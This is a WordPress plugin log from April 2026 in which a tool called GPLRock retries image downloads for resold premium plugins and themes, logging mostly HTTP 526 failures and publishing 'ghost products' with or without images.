WARNING: Image download failed for product pixelyoursite-pro-facebook-pixel-wordpress-plugin. URL: https://www.gplrock.com/wp-content/uploads/2020/07/PixelYourSite-Pro-Facebook-pixel-WordPress-plugin.jpg [05-Apr-2026 02:46:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pixelyoursite-pro-facebook-pixel-wordpress-plugin [05-Apr-2026 02:46:17 UTC] GPLRock: Image downloaded successfully for product yoast-local-seo-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ac6df2d5.jpg [05-Apr-2026 02:46:17 UTC] GPLRock: Using pre-downloaded image for product yoast-local-seo-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ac6df2d5.jpg [05-Apr-2026 02:46:17 UTC] GPLRock: Ghost product published with image - Product ID: yoast-local-seo-premium [05-Apr-2026 02:46:19 UTC] GPLRock: Image downloaded successfully for product yoast-video-seo-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b616eb22.jpg [05-Apr-2026 02:46:19 UTC] GPLRock: Using pre-downloaded image for product yoast-video-seo-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b616eb22.jpg [05-Apr-2026 02:46:19 UTC] GPLRock: Ghost product published with image - Product ID: yoast-video-seo-premium [05-Apr-2026 02:46:41 UTC] GPLRock: Image download failed for product virtual-assistant-for-wordpress-build-your-own-google-now-siri-or-cortana (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:46:43 UTC] GPLRock: Image download failed for product virtual-assistant-for-wordpress-build-your-own-google-now-siri-or-cortana (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:46:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/virtual-assistant-for-wordpress---build-your-own-google-now-siri-or-cortana-22059.webp for product virtual-assistant-for-wordpress-build-your-own-google-now-siri-or-cortana after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:46:45 UTC] GPLRock: Image download failed for product virtual-assistant-for-wordpress-build-your-own-google-now-siri-or-cortana (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:46:47 UTC] GPLRock: Image download failed for product virtual-assistant-for-wordpress-build-your-own-google-now-siri-or-cortana (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:46:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/virtual-assistant-for-wordpress---build-your-own-google-now-siri-or-cortana-22059.webp for product virtual-assistant-for-wordpress-build-your-own-google-now-siri-or-cortana after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:46:49 UTC] GPLRock WARNING: Image download failed for product virtual-assistant-for-wordpress-build-your-own-google-now-siri-or-cortana. URL: https://meldwp.com/wp-content/uploads/virtual-assistant-for-wordpress---build-your-own-google-now-siri-or-cortana-22059.webp [05-Apr-2026 02:46:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: virtual-assistant-for-wordpress-build-your-own-google-now-siri-or-cortana [05-Apr-2026 02:46:50 UTC] GPLRock: Image download failed for product corona-stats-covid-19-coronavirus-live-stats-widgets-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:46:52 UTC] GPLRock: Image download failed for product corona-stats-covid-19-coronavirus-live-stats-widgets-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:46:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/corona-stats---covid-19-coronavirus-live-stats--widgets-for-wordpress-14374.webp for product corona-stats-covid-19-coronavirus-live-stats-widgets-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:46:54 UTC] GPLRock: Image download failed for product corona-stats-covid-19-coronavirus-live-stats-widgets-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:46:56 UTC] GPLRock: Image download failed for product corona-stats-covid-19-coronavirus-live-stats-widgets-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:46:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/corona-stats---covid-19-coronavirus-live-stats--widgets-for-wordpress-14374.webp for product corona-stats-covid-19-coronavirus-live-stats-widgets-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:46:58 UTC] GPLRock WARNING: Image download failed for product corona-stats-covid-19-coronavirus-live-stats-widgets-for-wordpress. URL: https://meldwp.com/wp-content/uploads/corona-stats---covid-19-coronavirus-live-stats--widgets-for-wordpress-14374.webp [05-Apr-2026 02:46:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: corona-stats-covid-19-coronavirus-live-stats-widgets-for-wordpress [05-Apr-2026 02:46:58 UTC] GPLRock: Image download failed for product paintify-room-paint-color-visualizer-plugin-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:00 UTC] GPLRock: Image download failed for product paintify-room-paint-color-visualizer-plugin-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paintify--room-paint-color-visualizer-plugin--woocommerce-wordpress-8810.webp for product paintify-room-paint-color-visualizer-plugin-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:47:03 UTC] GPLRock: Image download failed for product paintify-room-paint-color-visualizer-plugin-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:05 UTC] GPLRock: Image download failed for product paintify-room-paint-color-visualizer-plugin-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paintify--room-paint-color-visualizer-plugin--woocommerce-wordpress-8810.webp for product paintify-room-paint-color-visualizer-plugin-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:47:07 UTC] GPLRock WARNING: Image download failed for product paintify-room-paint-color-visualizer-plugin-woocommerce-wordpress. URL: https://meldwp.com/wp-content/uploads/paintify--room-paint-color-visualizer-plugin--woocommerce-wordpress-8810.webp [05-Apr-2026 02:47:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: paintify-room-paint-color-visualizer-plugin-woocommerce-wordpress [05-Apr-2026 02:47:07 UTC] GPLRock: Image download failed for product woocommerce-email-templates (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:09 UTC] GPLRock: Image download failed for product woocommerce-email-templates (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-email-templates-31453.webp for product woocommerce-email-templates after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:47:11 UTC] GPLRock: Image download failed for product woocommerce-email-templates (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:14 UTC] GPLRock: Image download failed for product woocommerce-email-templates (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-email-templates-31453.webp for product woocommerce-email-templates after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:47:16 UTC] GPLRock WARNING: Image download failed for product woocommerce-email-templates. URL: https://meldwp.com/wp-content/uploads/woocommerce-email-templates-31453.webp [05-Apr-2026 02:47:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-email-templates [05-Apr-2026 02:47:16 UTC] GPLRock: Image download failed for product woocommerce-export-products-to-xls (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:18 UTC] GPLRock: Image download failed for product woocommerce-export-products-to-xls (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-export-products-to-xls-33495.webp for product woocommerce-export-products-to-xls after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:47:20 UTC] GPLRock: Image download failed for product woocommerce-export-products-to-xls (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:22 UTC] GPLRock: Image download failed for product woocommerce-export-products-to-xls (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-export-products-to-xls-33495.webp for product woocommerce-export-products-to-xls after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:47:24 UTC] GPLRock WARNING: Image download failed for product woocommerce-export-products-to-xls. URL: https://meldwp.com/wp-content/uploads/woocommerce-export-products-to-xls-33495.webp [05-Apr-2026 02:47:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-export-products-to-xls [05-Apr-2026 02:47:24 UTC] GPLRock: Image download failed for product contact-form-7-to-hubspot (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:27 UTC] GPLRock: Image download failed for product contact-form-7-to-hubspot (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contact-form-7-to-hubspot-27400.webp for product contact-form-7-to-hubspot after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:47:29 UTC] GPLRock: Image download failed for product contact-form-7-to-hubspot (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:31 UTC] GPLRock: Image download failed for product contact-form-7-to-hubspot (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contact-form-7-to-hubspot-27400.webp for product contact-form-7-to-hubspot after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:47:33 UTC] GPLRock WARNING: Image download failed for product contact-form-7-to-hubspot. URL: https://meldwp.com/wp-content/uploads/contact-form-7-to-hubspot-27400.webp [05-Apr-2026 02:47:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: contact-form-7-to-hubspot [05-Apr-2026 02:47:33 UTC] GPLRock: Image downloaded successfully for product emart-laravel-multi-vendor-ecommerce-advanced-cms (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9bc78cc2.webp [05-Apr-2026 02:47:33 UTC] GPLRock: Using pre-downloaded image for product emart-laravel-multi-vendor-ecommerce-advanced-cms: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9bc78cc2.webp [05-Apr-2026 02:47:33 UTC] GPLRock: Ghost product published with image - Product ID: emart-laravel-multi-vendor-ecommerce-advanced-cms [05-Apr-2026 02:47:33 UTC] GPLRock: Image download failed for product contact-form-7-autocomplete-off (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:35 UTC] GPLRock: Image download failed for product contact-form-7-autocomplete-off (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contact-form-7-autocomplete-off-13589.webp for product contact-form-7-autocomplete-off after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:47:38 UTC] GPLRock: Image download failed for product contact-form-7-autocomplete-off (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:40 UTC] GPLRock: Image download failed for product contact-form-7-autocomplete-off (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contact-form-7-autocomplete-off-13589.webp for product contact-form-7-autocomplete-off after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:47:42 UTC] GPLRock WARNING: Image download failed for product contact-form-7-autocomplete-off. URL: https://meldwp.com/wp-content/uploads/contact-form-7-autocomplete-off-13589.webp [05-Apr-2026 02:47:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: contact-form-7-autocomplete-off [05-Apr-2026 02:47:42 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-mine-flipbook (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:44 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-mine-flipbook (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---mine-flipbook-9060.webp for product wpbakery-page-builder-add-on-mine-flipbook after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:47:46 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-mine-flipbook (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:48 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-mine-flipbook (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---mine-flipbook-9060.webp for product wpbakery-page-builder-add-on-mine-flipbook after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:47:50 UTC] GPLRock WARNING: Image download failed for product wpbakery-page-builder-add-on-mine-flipbook. URL: https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---mine-flipbook-9060.webp [05-Apr-2026 02:47:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpbakery-page-builder-add-on-mine-flipbook [05-Apr-2026 02:47:51 UTC] GPLRock: Image download failed for product nex-industrial-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:53 UTC] GPLRock: Image download failed for product nex-industrial-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nex---industrial-wordpress-theme-25165.webp for product nex-industrial-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:47:55 UTC] GPLRock: Image download failed for product nex-industrial-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:57 UTC] GPLRock: Image download failed for product nex-industrial-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:47:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nex---industrial-wordpress-theme-25165.webp for product nex-industrial-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:47:59 UTC] GPLRock WARNING: Image download failed for product nex-industrial-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nex---industrial-wordpress-theme-25165.webp [05-Apr-2026 02:47:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nex-industrial-wordpress-theme [05-Apr-2026 02:48:18 UTC] GPLRock: Image download failed for product glint-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:48:20 UTC] GPLRock: Image download failed for product glint-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:48:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/glint---personal-portfolio-wordpress-theme-10681.webp for product glint-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:48:22 UTC] GPLRock: Image download failed for product glint-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:48:24 UTC] GPLRock: Image download failed for product glint-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:48:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/glint---personal-portfolio-wordpress-theme-10681.webp for product glint-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:48:27 UTC] GPLRock WARNING: Image download failed for product glint-personal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/glint---personal-portfolio-wordpress-theme-10681.webp [05-Apr-2026 02:48:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: glint-personal-portfolio-wordpress-theme [05-Apr-2026 02:48:27 UTC] GPLRock: Image download failed for product acebeat-dj-personal-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:48:29 UTC] GPLRock: Image download failed for product acebeat-dj-personal-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:48:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/acebeat---dj-personal-page-wordpress-theme-14738.webp for product acebeat-dj-personal-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:48:31 UTC] GPLRock: Image download failed for product acebeat-dj-personal-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:48:33 UTC] GPLRock: Image download failed for product acebeat-dj-personal-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:48:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/acebeat---dj-personal-page-wordpress-theme-14738.webp for product acebeat-dj-personal-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:48:35 UTC] GPLRock WARNING: Image download failed for product acebeat-dj-personal-page-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/acebeat---dj-personal-page-wordpress-theme-14738.webp [05-Apr-2026 02:48:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: acebeat-dj-personal-page-wordpress-theme [05-Apr-2026 02:48:35 UTC] GPLRock: Image download failed for product inestit-private-investigator-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:48:37 UTC] GPLRock: Image download failed for product inestit-private-investigator-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:48:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/inestit---private-investigator-wordpress-theme-8518.webp for product inestit-private-investigator-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:48:40 UTC] GPLRock: Image download failed for product inestit-private-investigator-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:48:42 UTC] GPLRock: Image download failed for product inestit-private-investigator-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:48:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/inestit---private-investigator-wordpress-theme-8518.webp for product inestit-private-investigator-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:48:44 UTC] GPLRock WARNING: Image download failed for product inestit-private-investigator-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/inestit---private-investigator-wordpress-theme-8518.webp [05-Apr-2026 02:48:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: inestit-private-investigator-wordpress-theme [05-Apr-2026 02:48:44 UTC] GPLRock: Image download failed for product calimera-multiple-restaurant-bistro-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:48:46 UTC] GPLRock: Image download failed for product calimera-multiple-restaurant-bistro-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:48:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/calimera---multiple-restaurant--bistro-wordpress-theme-18669.webp for product calimera-multiple-restaurant-bistro-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:48:48 UTC] GPLRock: Image download failed for product calimera-multiple-restaurant-bistro-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:48:50 UTC] GPLRock: Image download failed for product calimera-multiple-restaurant-bistro-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:48:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/calimera---multiple-restaurant--bistro-wordpress-theme-18669.webp for product calimera-multiple-restaurant-bistro-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:48:52 UTC] GPLRock WARNING: Image download failed for product calimera-multiple-restaurant-bistro-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/calimera---multiple-restaurant--bistro-wordpress-theme-18669.webp [05-Apr-2026 02:48:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: calimera-multiple-restaurant-bistro-wordpress-theme [05-Apr-2026 02:48:53 UTC] GPLRock: Image downloaded successfully for product botanica-wordpress-theme-for-spa-beauty-wellness (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3a4e6fc6.webp [05-Apr-2026 02:48:53 UTC] GPLRock: Using pre-downloaded image for product botanica-wordpress-theme-for-spa-beauty-wellness: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3a4e6fc6.webp [05-Apr-2026 02:48:53 UTC] GPLRock: Ghost product published with image - Product ID: botanica-wordpress-theme-for-spa-beauty-wellness [05-Apr-2026 02:48:53 UTC] GPLRock: Image download failed for product gmaakeup-makeup-artist-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:48:55 UTC] GPLRock: Image download failed for product gmaakeup-makeup-artist-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:48:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gmaakeup---makeup-artist-wordpress-theme-6234.webp for product gmaakeup-makeup-artist-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:48:57 UTC] GPLRock: Image download failed for product gmaakeup-makeup-artist-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:48:59 UTC] GPLRock: Image download failed for product gmaakeup-makeup-artist-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gmaakeup---makeup-artist-wordpress-theme-6234.webp for product gmaakeup-makeup-artist-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:49:01 UTC] GPLRock WARNING: Image download failed for product gmaakeup-makeup-artist-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gmaakeup---makeup-artist-wordpress-theme-6234.webp [05-Apr-2026 02:49:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gmaakeup-makeup-artist-wordpress-theme [05-Apr-2026 02:49:01 UTC] GPLRock: Image download failed for product organey-organic-food-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:03 UTC] GPLRock: Image download failed for product organey-organic-food-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/organey---organic-food-woocommerce-wordpress-theme-15784.webp for product organey-organic-food-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:49:06 UTC] GPLRock: Image download failed for product organey-organic-food-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:08 UTC] GPLRock: Image download failed for product organey-organic-food-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/organey---organic-food-woocommerce-wordpress-theme-15784.webp for product organey-organic-food-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:49:10 UTC] GPLRock WARNING: Image download failed for product organey-organic-food-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/organey---organic-food-woocommerce-wordpress-theme-15784.webp [05-Apr-2026 02:49:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: organey-organic-food-woocommerce-wordpress-theme [05-Apr-2026 02:49:10 UTC] GPLRock: Image download failed for product woody-elementor-coming-soon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:12 UTC] GPLRock: Image download failed for product woody-elementor-coming-soon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woody---elementor-coming-soon-wordpress-theme-11955.webp for product woody-elementor-coming-soon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:49:14 UTC] GPLRock: Image download failed for product woody-elementor-coming-soon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:16 UTC] GPLRock: Image download failed for product woody-elementor-coming-soon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woody---elementor-coming-soon-wordpress-theme-11955.webp for product woody-elementor-coming-soon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:49:18 UTC] GPLRock WARNING: Image download failed for product woody-elementor-coming-soon-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/woody---elementor-coming-soon-wordpress-theme-11955.webp [05-Apr-2026 02:49:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woody-elementor-coming-soon-wordpress-theme [05-Apr-2026 02:49:19 UTC] GPLRock: Image download failed for product web-hosting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:21 UTC] GPLRock: Image download failed for product web-hosting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/web-hosting-wordpress-theme-2202.webp for product web-hosting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:49:23 UTC] GPLRock: Image download failed for product web-hosting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:25 UTC] GPLRock: Image download failed for product web-hosting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/web-hosting-wordpress-theme-2202.webp for product web-hosting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:49:27 UTC] GPLRock WARNING: Image download failed for product web-hosting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/web-hosting-wordpress-theme-2202.webp [05-Apr-2026 02:49:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: web-hosting-wordpress-theme [05-Apr-2026 02:49:28 UTC] GPLRock: Image download failed for product big-junior-multi-purpose-responsive-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:30 UTC] GPLRock: Image download failed for product big-junior-multi-purpose-responsive-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/big-junior---multi-purpose-responsive-theme-2348.webp for product big-junior-multi-purpose-responsive-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:49:32 UTC] GPLRock: Image download failed for product big-junior-multi-purpose-responsive-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:34 UTC] GPLRock: Image download failed for product big-junior-multi-purpose-responsive-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/big-junior---multi-purpose-responsive-theme-2348.webp for product big-junior-multi-purpose-responsive-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:49:36 UTC] GPLRock WARNING: Image download failed for product big-junior-multi-purpose-responsive-theme. URL: https://meldwp.com/wp-content/uploads/big-junior---multi-purpose-responsive-theme-2348.webp [05-Apr-2026 02:49:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: big-junior-multi-purpose-responsive-theme [05-Apr-2026 02:49:51 UTC] GPLRock: Image download failed for product organic-food-nutritionist-farm-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:53 UTC] GPLRock: Image download failed for product organic-food-nutritionist-farm-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:49:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/organic-food---nutritionist--farm-wordpress-theme-19721.webp for product organic-food-nutritionist-farm-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:49:55 UTC] GPLRock: Image download failed for product organic-food-nutritionist-farm-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... 